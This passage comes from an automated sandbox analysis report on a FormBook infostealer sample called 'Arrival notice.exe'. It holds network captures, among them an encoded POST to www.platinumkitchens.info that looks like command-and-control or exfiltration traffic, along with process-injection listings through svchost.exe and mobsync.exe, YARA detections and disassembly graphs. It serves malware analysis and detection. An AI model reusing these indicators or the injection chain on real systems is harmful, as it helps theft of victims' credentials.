6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 [TRUNCATED]
                                                                  Data Ascii: 298a<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.albero-dveri.online</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text"> &nbsp;<a class="b-link" href="https://r [TRUNCATED]
                                                                  Oct 7, 2024 10:41:28.052321911 CEST1236INData Raw: 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61
                                                                  Data Ascii: /div><div class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.albero-dveri.online</h1><p class="b-parki
                                                                  Oct 7, 2024 10:41:28.052339077 CEST1236INData Raw: 69 74 6c 65 22 3e d0 94 d1 80 d1 83 d0 b3 d0 b8 d0 b5 20 d1 83 d1 81 d0 bb d1 83 d0 b3 d0 b8 20 d0 a0 d0 b5 d0 b3 2e d1 80 d1 83 3c 2f 68 32 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 22 3e 3c 64 69 76
                                                                  Data Ascii: itle"> .</h2><div class="b-parking__promo"><div class="b-parking__promo-item b-parking__promo-item_type_hosting-overall"><div class="b-parking__promo-header"><span class="b-parking__promo-image b-parking__pro
                                                                  Oct 7, 2024 10:41:28.052436113 CEST1236INData Raw: d1 80 d0 b8 d0 be d0 b4 2e 3c 2f 70 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 62 75 74 74 6f 6e 2d 77 72 61 70 70 65 72 22 3e 3c 61 20 63 6c 61 73 73 3d 22 62 2d 62 75 74 74 6f 6e 20 62
                                                                  Data Ascii: .</p></li></ul><div class="b-parking__button-wrapper"><a class="b-button b-button_color_primary b-button_style_wide b-button_size_medium-compact b-button_text-size_normal b-parking__button b-parking__button_type_hosting" href="https://
                                                                  Oct 7, 2024 10:41:28.052453995 CEST896INData Raw: 64 76 65 72 69 2e 6f 6e 6c 69 6e 65 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 70 61 72 6b 69 6e 67 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 73 5f 6c 61 6e 64 5f 73 65 72 76 65 72 26 61 6d 70 3b 72 65 67 5f 73 6f 75 72 63 65 3d 70 61 72 6b 69 6e 67 5f
                                                                  Data Ascii: dveri.online&utm_medium=parking&utm_campaign=s_land_server&amp;reg_source=parking_auto"></a></div><div class="b-parking__promo-item b-parking__promo-item_type_cms"><strong class="b-title b-title_size_large-compact">
                                                                  Oct 7, 2024 10:41:28.052587986 CEST1236INData Raw: 64 65 72 22 3e 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 62 2d 74 69 74 6c 65 20 62 2d 74 69 74 6c 65 5f 73 69 7a 65 5f 6c 61 72 67 65 2d 63 6f 6d 70 61 63 74 22 3e d0 9a d0 be d0 bd d1 81 d1 82 d1 80 d1 83 d0 ba d1 82 d0 be d1 80 20 d1 81 d0
                                                                  Data Ascii: der"><strong class="b-title b-title_size_large-compact"> .</strong><p class="b-text b-parking__promo-description"> &nbsp; &nbs
                                                                  Oct 7, 2024 10:41:28.052604914 CEST1236INData Raw: 73 70 6c 61 74 6e 79 79 2d 73 73 6c 2d 73 65 72 74 69 66 69 6b 61 74 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 77 77 77 2e 61 6c 62 65 72 6f 2d 64 76 65 72 69 2e 6f 6e 6c 69 6e 65 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 70 61 72 6b 69 6e 67 26 75 74 6d 5f
                                                                  Data Ascii: splatnyy-ssl-sertifikat?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_land_fssl&reg_source=parking_auto"> SSL</a><p class="b-text b-parking__promo-description l-margin_top-small l-margin_bottom-normal l-m
                                                                  Oct 7, 2024 10:41:28.052622080 CEST1236INData Raw: 20 27 26 27 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 6b 73 5b 20 69 20 5d 2e 68 72 65 66 20 3d 20 6c 69 6e 6b 73
                                                                  Data Ascii: '&'; } else { links[ i ].href = links[ i ].href + '?'; } links[ i ].href = links[ i ].href + 'rid=' + data.ref_id; } } }
                                                                  Oct 7, 2024 10:41:28.052768946 CEST1236INData Raw: 78 74 20 3d 20 73 70 61 6e 73 5b 20 69 20 5d 5b 20 74 20 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 20 3d 20 70 75 6e 79 63 6f 64 65 2e 54 6f 55 6e 69 63 6f 64 65 28 20 74 65 78 74 20 29 3b 0a 20 20 20 20 20 20 20 20 20
                                                                  Data Ascii: xt = spans[ i ][ t ]; text = punycode.ToUnicode( text ); spans[ i ][ t ] = text; } else if ( spans[ i ].className.match( /^no-puny/ ) ) { spans[ i ].style.display = 'none';
                                                                  Oct 7, 2024 10:41:28.052784920 CEST13INData Raw: 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: /html>0


                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                  41192.168.2.10500173.33.130.19080
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 7, 2024 10:41:35.274629116 CEST806OUTPOST /nkwh/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 194
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.platinumkitchens.info
                                                                  Origin: http://www.platinumkitchens.info
                                                                  Referer: http://www.platinumkitchens.info/nkwh/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Raw: 45 5a 32 6c 6f 3d 4b 5a 53 47 62 50 35 71 43 71 7a 35 2b 47 6b 65 75 35 74 74 2f 4f 67 51 54 63 70 37 34 67 4d 38 71 6d 45 67 72 50 34 64 4d 54 6a 38 5a 74 6a 78 64 73 58 45 59 69 43 75 39 66 74 39 44 6e 6d 72 6f 47 6e 6d 30 79 69 6d 70 44 78 30 4a 73 35 66 4f 30 4a 45 70 57 4a 33 72 35 75 41 33 4f 77 73 4f 49 59 32 4b 50 31 67 46 4f 68 73 31 62 41 43 39 2f 67 68 56 46 7a 4a 38 65 4d 7a 6b 37 66 57 50 6f 68 5a 32 6e 6a 66 73 57 35 66 61 71 39 58 49 34 62 64 42 6d 70 44 55 44 4c 56 52 36 44 2f 4d 79 49 45 46 74 69 30 44 61 68 39 43 6a 30 78 65 42 49 4d 6a 4f 58 75 48 44 6c 4f
                                                                  Data Ascii: EZ2lo=KZSGbP5qCqz5+Gkeu5tt/OgQTcp74gM8qmEgrP4dMTj8ZtjxdsXEYiCu9ft9DnmroGnm0yimpDx0Js5fO0JEpWJ3r5uA3OwsOIY2KP1gFOhs1bAC9/ghVFzJ8eMzk7fWPohZ2njfsW5faq9XI4bdBmpDUDLVR6D/MyIEFti0Dah9Cj0xeBIMjOXuHDlO


                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:2
                                                                  Start time:04:37:25
                                                                  Start date:07/10/2024
                                                                  Path:C:\Users\user\Desktop\Arrival notice.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\Arrival notice.exe"
                                                                  Imagebase:0x400000
                                                                  File size:1'401'539 bytes
                                                                  MD5 hash:50397BFAB2624CCCB8C7AE8CE667048C
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:9
                                                                  Start time:04:37:31
                                                                  Start date:07/10/2024
                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\Arrival notice.exe"
                                                                  Imagebase:0xf10000
                                                                  File size:46'504 bytes
                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1730283884.0000000008C00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1730283884.0000000008C00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1725426506.0000000004390000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1725426506.0000000004390000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:11
                                                                  Start time:04:38:01
                                                                  Start date:07/10/2024
                                                                  Path:C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe"
                                                                  Imagebase:0xae0000
                                                                  File size:140'800 bytes
                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3758373668.0000000009130000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3758373668.0000000009130000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3750353258.0000000003960000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3750353258.0000000003960000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:12
                                                                  Start time:04:38:04
                                                                  Start date:07/10/2024
                                                                  Path:C:\Windows\SysWOW64\mobsync.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\SysWOW64\mobsync.exe"
                                                                  Imagebase:0x8f0000
                                                                  File size:93'696 bytes
                                                                  MD5 hash:F7114D05B442F103BD2D3E20E78A7AA5
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3747714326.0000000002D10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3747714326.0000000002D10000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3746700176.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3746700176.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                  Reputation:low
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:17
                                                                  Start time:04:38:30
                                                                  Start date:07/10/2024
                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                  Imagebase:0x7ff613480000
                                                                  File size:676'768 bytes
                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Disassembly

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:1.4%
                                                                    Dynamic/Decrypted Code Coverage:4.7%
                                                                    Signature Coverage:13.3%
                                                                    Total number of Nodes:128
                                                                    Total number of Limit Nodes:9
                                                                    execution_graph 75113 424c63 75114 424c7f 75113->75114 75115 424ca7 75114->75115 75116 424cbb 75114->75116 75117 42c883 NtClose 75115->75117 75123 42c883 75116->75123 75119 424cb0 75117->75119 75120 424cc4 75126 42ea53 RtlAllocateHeap 75120->75126 75122 424ccf 75124 42c89d 75123->75124 75125 42c8ae NtClose 75124->75125 75125->75120 75126->75122 75127 42be63 75128 42be80 75127->75128 75131 3672df0 LdrInitializeThunk 75128->75131 75129 42bea8 75131->75129 75132 425003 75133 42501c 75132->75133 75134 425067 75133->75134 75137 4250aa 75133->75137 75139 4250af 75133->75139 75140 42e933 75134->75140 75138 42e933 RtlFreeHeap 75137->75138 75138->75139 75143 42cc03 75140->75143 75142 425077 75144 42cc1d 75143->75144 75145 42cc2e RtlFreeHeap 75144->75145 75145->75142 75151 42fb53 75152 42e933 RtlFreeHeap 75151->75152 75153 42fb68 75152->75153 75154 42ea13 75157 42cbb3 75154->75157 75156 42ea2e 75158 42cbcd 75157->75158 75159 42cbde RtlAllocateHeap 75158->75159 75159->75156 75146 41b603 75147 41b647 75146->75147 75148 41b668 75147->75148 75149 42c883 NtClose 75147->75149 75149->75148 75160 4143b3 75161 4143cc 75160->75161 75166 417b13 75161->75166 75163 4143e7 75164 414433 75163->75164 75165 414420 PostThreadMessageW 75163->75165 75165->75164 75167 417b37 75166->75167 75168 417b73 LdrLoadDll 75167->75168 75169 417b3e 75167->75169 75168->75169 75169->75163 75170 41a8b3 75171 41a922 75170->75171 75172 41a8cb 75170->75172 75172->75171 75174 41e7c3 75172->75174 75175 41e7e9 75174->75175 75179 41e8dd 75175->75179 75180 42fb93 RtlAllocateHeap RtlFreeHeap 75175->75180 75177 41e87b 75177->75179 75181 42beb3 75177->75181 75179->75171 75180->75177 75182 42becd 75181->75182 75185 3672c0a 75182->75185 75183 42bef9 75183->75179 75186 3672c11 75185->75186 75187 3672c1f LdrInitializeThunk 75185->75187 75186->75183 75187->75183 75188 4190b5 75189 42c883 NtClose 75188->75189 75190 4190bf 75189->75190 75150 3672b60 LdrInitializeThunk 75191 401d99 75192 401da0 75191->75192 75195 42ffc3 75192->75195 75193 401dc9 75193->75193 75198 42e4f3 75195->75198 75199 42e519 75198->75199 75210 407663 75199->75210 75201 42e52f 75202 42e58b 75201->75202 75213 41b413 75201->75213 75202->75193 75204 42e54e 75205 42e563 75204->75205 75228 42cc53 75204->75228 75224 428533 75205->75224 75208 42e57d 75209 42cc53 ExitProcess 75208->75209 75209->75202 75231 4167d3 75210->75231 75212 407670 75212->75201 75214 41b43f 75213->75214 75246 41b303 75214->75246 75217 41b484 75220 41b4a0 75217->75220 75222 42c883 NtClose 75217->75222 75218 41b46c 75219 41b477 75218->75219 75221 42c883 NtClose 75218->75221 75219->75204 75220->75204 75221->75219 75223 41b496 75222->75223 75223->75204 75225 428595 75224->75225 75227 4285a2 75225->75227 75257 418973 75225->75257 75227->75208 75229 42cc6d 75228->75229 75230 42cc7b ExitProcess 75229->75230 75230->75205 75233 4167ea 75231->75233 75232 416803 75232->75212 75233->75232 75238 42d2f3 75233->75238 75235 41685e 75235->75232 75245 429253 NtClose LdrInitializeThunk 75235->75245 75237 4168ac 75237->75212 75239 42d30d 75238->75239 75240 42d33c 75239->75240 75241 42beb3 LdrInitializeThunk 75239->75241 75240->75235 75242 42d399 75241->75242 75243 42e933 RtlFreeHeap 75242->75243 75244 42d3af 75243->75244 75244->75235 75245->75237 75247 41b3f9 75246->75247 75248 41b31d 75246->75248 75247->75217 75247->75218 75252 42bf53 75248->75252 75251 42c883 NtClose 75251->75247 75253 42bf70 75252->75253 75256 36735c0 LdrInitializeThunk 75253->75256 75254 41b3ed 75254->75251 75256->75254 75258 41899d 75257->75258 75264 418e9b 75258->75264 75265 414033 75258->75265 75260 418ac4 75261 42e933 RtlFreeHeap 75260->75261 75260->75264 75262 418adc 75261->75262 75263 42cc53 ExitProcess 75262->75263 75262->75264 75263->75264 75264->75227 75269 414050 75265->75269 75267 4140ac 75267->75260 75268 4140b6 75268->75260 75269->75268 75270 41b723 RtlFreeHeap LdrInitializeThunk 75269->75270 75270->75267

                                                                    Executed Functions

                                                                    Function 00401A2C Relevance: 2.9, Strings: 2, Instructions: 364COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 47 401a2c-401a4f 48 401a51-401a52 47->48 49 401a54-401a59 48->49 50 401ac5-401ad8 48->50 53 401a5a-401a5b 49->53 54 401a1e 49->54 51 401ada-401aea 50->51 52 401b3d-401b4f 50->52 55 401aec-401aef 51->55 56 401b5d-401b60 51->56 57 401b51-401b53 52->57 58 401bcc-401bd1 52->58 59 4019ec 53->59 60 401a5d 53->60 54->47 63 401b61 55->63 66 401af1-401af5 55->66 56->63 64 401bd3-401bd9 56->64 61 401b54-401b5b 57->61 58->64 67 401c44-401c4f 58->67 65 4019ee 59->65 62 401a63-401a98 60->62 61->56 76 401ab3-401ab5 62->76 69 401b62-401b66 63->69 70 401b83 63->70 75 401bda 64->75 71 4019f0 65->71 72 4019a6-4019dc 65->72 77 401b67-401b68 66->77 80 401af7 66->80 73 401c50-401c63 67->73 69->77 83 401b8c-401b92 70->83 71->62 78 4019f2-401a08 71->78 96 401992-401994 72->96 97 4019de 72->97 73->73 79 401c65 73->79 82 401bdc-401be2 75->82 76->50 77->75 84 401b69 77->84 78->65 93 401a0a-401a12 78->93 86 401c68-401c72 79->86 80->84 87 401af9 80->87 89 401be3-401be6 82->89 90 401b93 83->90 84->82 92 401b6a 84->92 94 401c73-401c7a 86->94 95 401afa-401afe 87->95 91 401b94-401bc1 90->91 116 401bc3-401bc7 91->116 117 401c34-401c35 91->117 92->83 98 401b6b-401b6e 92->98 93->54 94->79 110 401c7c-401c80 94->110 95->95 100 401aff-401b00 95->100 96->72 97->48 101 4019e0-4019e7 97->101 98->61 103 401b6f-401b70 98->103 105 401b02 100->105 106 401b73-401b78 100->106 101->53 108 4019e9-4019ea 101->108 103->89 109 401b71 103->109 105->76 112 401b04 105->112 106->91 111 401b7a-401b7b 106->111 109->90 114 401b72 109->114 118 401c81-401c92 110->118 111->70 112->52 114->106 119 401c39-401c3c 116->119 120 401bc9 116->120 117->119 118->118 121 401c94 118->121 119->94 122 401c3e 119->122 123 401beb 120->123 124 401bcb 120->124 125 401c96-401cac 121->125 122->67 123->86 128 401bed-401bf0 123->128 124->58 126 401cae 125->126 127 401caf-401cb5 125->127 126->127 127->125 129 401cb7-401cbc 127->129 128->117 130 401cc0-401cd1 129->130 130->130 131 401cd3-401cdb 130->131 132 401ce0-401ce8 131->132 133 401cea-401cee 132->133 134 401cef 132->134 133->134 135 401cf1 134->135 136 401cf4-401cfa 134->136 135->136 136->132 137 401cfc-401d1f call 401090 call 401f30 136->137 142 401d22-401d37 137->142 142->142 143 401d39-401d58 142->143 144 401d60-401d73 143->144 144->144 145 401d75-401d86 144->145 145->145 146 401d88-401d97 145->146 147 401da0-401db1 146->147 147->147 148 401db3-401dc4 147->148 148->148 149 401dc6 call 42ffc3 148->149 150 401dc9 149->150 151 401dd0-401de5 150->151 151->151 152 401de7-401def 151->152
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: VUUU$gfff
                                                                    • API String ID: 0-2662692612
                                                                    • Opcode ID: d0c17e544d73b4e645f81ccb52a945aa198a982ffe7c82cbeab1f48b2a6b5aac
                                                                    • Instruction ID: c3712facee774aae929bc6ee10bbc95bc0ecd42af454c1b48a7cdbc80896ea68
                                                                    • Opcode Fuzzy Hash: d0c17e544d73b4e645f81ccb52a945aa198a982ffe7c82cbeab1f48b2a6b5aac
                                                                    • Instruction Fuzzy Hash: 05B1EF72B0421547DB18CA29C8911E9B772EBE4314B58427FD412AF3F2E738A846C789
                                                                    Function 00401C43 Relevance: 2.6, Strings: 2, Instructions: 141COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 154 401c43-401c4f 155 401c50-401c63 154->155 155->155 156 401c65-401c7a 155->156 160 401c7c-401c80 156->160 162 401c81-401c92 160->162 162->162 163 401c94 162->163 164 401c96-401cac 163->164 165 401cae 164->165 166 401caf-401cb5 164->166 165->166 166->164 167 401cb7-401cbc 166->167 168 401cc0-401cd1 167->168 168->168 169 401cd3-401cdb 168->169 170 401ce0-401ce8 169->170 171 401cea-401cee 170->171 172 401cef 170->172 171->172 173 401cf1 172->173 174 401cf4-401cfa 172->174 173->174 174->170 175 401cfc-401d1f call 401090 call 401f30 174->175 180 401d22-401d37 175->180 180->180 181 401d39-401d58 180->181 182 401d60-401d73 181->182 182->182 183 401d75-401d86 182->183 183->183 184 401d88-401d97 183->184 185 401da0-401db1 184->185 185->185 186 401db3-401dc4 185->186 186->186 187 401dc6 call 42ffc3 186->187 188 401dc9 187->188 189 401dd0-401de5 188->189 189->189 190 401de7-401def 189->190
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: VUUU$gfff
                                                                    • API String ID: 0-2662692612
                                                                    • Opcode ID: fdc30f867828bbf7ed95b9b052e7e013fda40bacfbfdd0768dcfe84ec5fb3a77
                                                                    • Instruction ID: 7d70af57adc5f266905b328d9540477f4926df0b1c5d44cd598b593a49ab4cfb
                                                                    • Opcode Fuzzy Hash: fdc30f867828bbf7ed95b9b052e7e013fda40bacfbfdd0768dcfe84ec5fb3a77
                                                                    • Instruction Fuzzy Hash: 6C41EA72F0052947EB6C895DCC5229EB566EBE4344F58827BE90AFF3E0F638AD114784
                                                                    Function 00417B13 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 237 417b13-417b2f 238 417b37-417b3c 237->238 239 417b32 call 42f633 237->239 240 417b42-417b50 call 42fc33 238->240 241 417b3e-417b41 238->241 239->238 244 417b60-417b71 call 42dfc3 240->244 245 417b52-417b5d call 42fed3 240->245 250 417b73-417b87 LdrLoadDll 244->250 251 417b8a-417b8d 244->251 245->244 250->251
                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417B85
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: 335b9d072062c93c8d5841efebb952b058b4076accb46d6834c6a2a97a5bff61
                                                                    • Instruction ID: 3b68c651edbcd165f6097cc7e3ac61de74ab67ddd2178e7deebf73ab7e148263
                                                                    • Opcode Fuzzy Hash: 335b9d072062c93c8d5841efebb952b058b4076accb46d6834c6a2a97a5bff61
                                                                    • Instruction Fuzzy Hash: F00171B1E4420DABDF10DBE1DC42FDEB3B8AB54308F4041AAF90897240F634EB598B95
                                                                    Function 0042C883 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 274 42c883-42c8bc call 404933 call 42dad3 NtClose
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID:
                                                                    • API String ID: 3535843008-0
                                                                    • Opcode ID: be3207122271e7a3f35108bc16ee7d5319e0d387d2d3b83b9a8a4fa6e62be9ee
                                                                    • Instruction ID: c7ec851e91c1825b360f1f11ef8ece591ee342df7236261bc96b3fb8706eeb8c
                                                                    • Opcode Fuzzy Hash: be3207122271e7a3f35108bc16ee7d5319e0d387d2d3b83b9a8a4fa6e62be9ee
                                                                    • Instruction Fuzzy Hash: BCE046762006187BC620AA6ADC01FDBB76CEFC6754F40442AFA0CA7242C6B0BA0086A4
                                                                    Function 036735C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 6137beca0e7834bca7ee2681fdbfb31d3478a6c9e68e18d62e9f842641a3eaf3
                                                                    • Instruction ID: 14704e88bd9990a7bf10593cddd3698b0d90077dcbd448423a2d23fe0b545408
                                                                    • Opcode Fuzzy Hash: 6137beca0e7834bca7ee2681fdbfb31d3478a6c9e68e18d62e9f842641a3eaf3
                                                                    • Instruction Fuzzy Hash: 3A90023160550802D100B6584554746100687D4301FA5C511A042466CE87D58A5165A2
                                                                    Function 03672B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
